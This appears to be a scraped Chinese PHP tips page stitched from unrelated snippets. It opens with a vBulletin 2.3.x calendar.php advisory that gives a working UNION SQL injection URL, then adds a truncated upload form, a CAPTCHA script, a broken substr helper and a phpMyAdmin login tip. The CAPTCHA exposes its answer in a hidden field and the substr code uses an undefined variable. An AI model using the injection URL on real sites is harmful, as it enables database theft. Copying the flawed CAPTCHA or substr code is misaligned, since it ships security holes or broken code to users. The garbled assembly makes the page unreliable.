vBulletin Forum 2.3.xx SQL Injection
There exist a sql injection problem in calendar.php.
-------- Cut from line 585 in calendar.php ----------
else if ($action == "edit")
{
$eventinfo = $DB_site->query_first("SELECT allowsmilies,public,userid,
eventdate,event,subject FROM calendar_events WHERE eventid = $eventid");
-----------------------------------------------------
If the MySQL version is greater than 4.00, a UNION attack could be used.
-----------------------------------------
http://ww.xxx.com/bbs/calendar.php?action=edit&eventid=12%20union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_ev
ents%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate
-----------------------------------------
The query_first function will only return the first row of the query result, so make sure it returns !
the one you want.
多文件上传的例子
//upload_html.php---------------------------------------------------------------------------------------------
<HTML>
<HEAD>
<TITLE>上传文件</TITLE>
</HEAD>
<script>
function beforesubmit(forma)
{
var indexnamea=forma.indexname.value;
var upfilea=forma.upfile.value;
var k=/ /g;
var indexnamea=indexnamea.replace(k,"");
var upfilea=upfilea.replace(k,"");
if(indexnamea==""
upfilea=="")
{
alert("目录名称或上传的目录不能为空!");
return false;
}
return true;
}
</script>
<BODY BGCOLOR=WHITE>
<BR>
<form name=form1 action="upload.php" method=post enctype="multipart/form-data" > ";
<table cellspacing="1" cellpadding="5" border="0" width="580" bgcolor="#C2E2F5">
<tr bgcolor="#E3F2FB" align="center">
<td width="280" align="center" height="30">上传的文件</td>
</tr>
<?
for($i=1;$i<8;$i++)
{
$upfile="upfile".strval($i);
echo " <tr> ";
echo " <td bgcolor=#F5FBFE width=264><input type=file name=$upfile lengh=25></td> ";
echo " </tr> ";
}
?>
<tr bgcolor="#E3F2FB">
<td colspan="2" height="1">
</td>
图形数字验证代码
Code:
<?
/*
* Filename: authpage.php
*/
srand((double)microtime()*1000000);
//验证用户输入是否和验证码一致
if(isset($_POST['authinput']))
{
if(strcmp($_POST['authnum'],$_POST['authinput'])==0)
echo "验证成功!";
else
echo "验证失败!";
}
//生成新的四位整数验证码
while(($authnum=rand()%10000)<1000);
?>
<form action=authpage.php method=post>
<table>
请输入验证码:<input type=text name=authinput style="width: 80px"><br>
<input type=submit name="验证" value="提交验证码">
<input type=hidden name=authnum value=<? echo $authnum; ?>>
<img" width=100% src=authimg.php?authnum=<? echo $authnum; ?>>
</table>
</form>
-------------------------------------------------------------------------------------------------------------
<?
/*
* Filename: authimg.php
*/
//生成验证码图片
Header("Content-type: image/PNG");
srand((double)microtime()*1000000);
$im = imagecreate(58,28);
$black = ImageColorAllocate($im, 0,0,0);
$white = ImageColorAllocate($im, 255,255,255);
$gray = ImageColorAllocate($im, 200,200,200);
imagefill($im,68,30,$gray);
//将四位整数验证码绘入图片
imagestring($im, 5, 10, 8, $HTTP_GET_VARS['authnum'], $white);
for($i=0;$i<50;$i++) //加入干扰象素
{
imagesetpixel($im, rand()%70 , rand()%30 , $gray);
}
ImagePNG($im);
ImageDestroy($im);
substr()函数中文版
普通的substr()函数可以取得字符串的指定长度子字符串,但遇到中文时可能会在新字符串末尾产生乱码,下面这个函数将超过$len长度的字符串转换成以“...”结尾,并且去除了乱码。
用法:$new = getsubstring($old,20);
function getsubstring($str,$len)
{
for($i = 0;$i <$end;$i++)
{
if ($i >=0 AND $i <$end)
{
if(ord(substr($str,$i,1)) > 0xa1)
$result_str.=substr($str,$i,2);
else
$result_str.=substr($str,$i,1);
}
if(ord(substr($str,$i,1)) > 0xa1)
$i++;
}
if(strlen($str)<=$end)
return $result_str;
else
return $result_str."...";
}
如何给phpadmin一个保护
如何给phpadmin一个保护,即要输入密码才能进入phpadmin
---------------------------------------------------------------
在config.inc.php中:
$cfgServers[$i]['auth_type'] = 'cookie'; // Authentication method (config, http or cookie based)?
有三种选择config http cookie
config : 按配置文件中的密码 (也就是标准方式) 这种方式没有认证
http : 使用HTTP认证
cookie : 使用COOKIE登录认证
如果是使用IIS+PHP是没有办法使用HTTP认证的.这个功能只有在使用APACHE+模块安装的PHP上才能使用.
你使用COOKIE方式吧,安全性也是很好的呀.
上一篇: 多文件上传的例子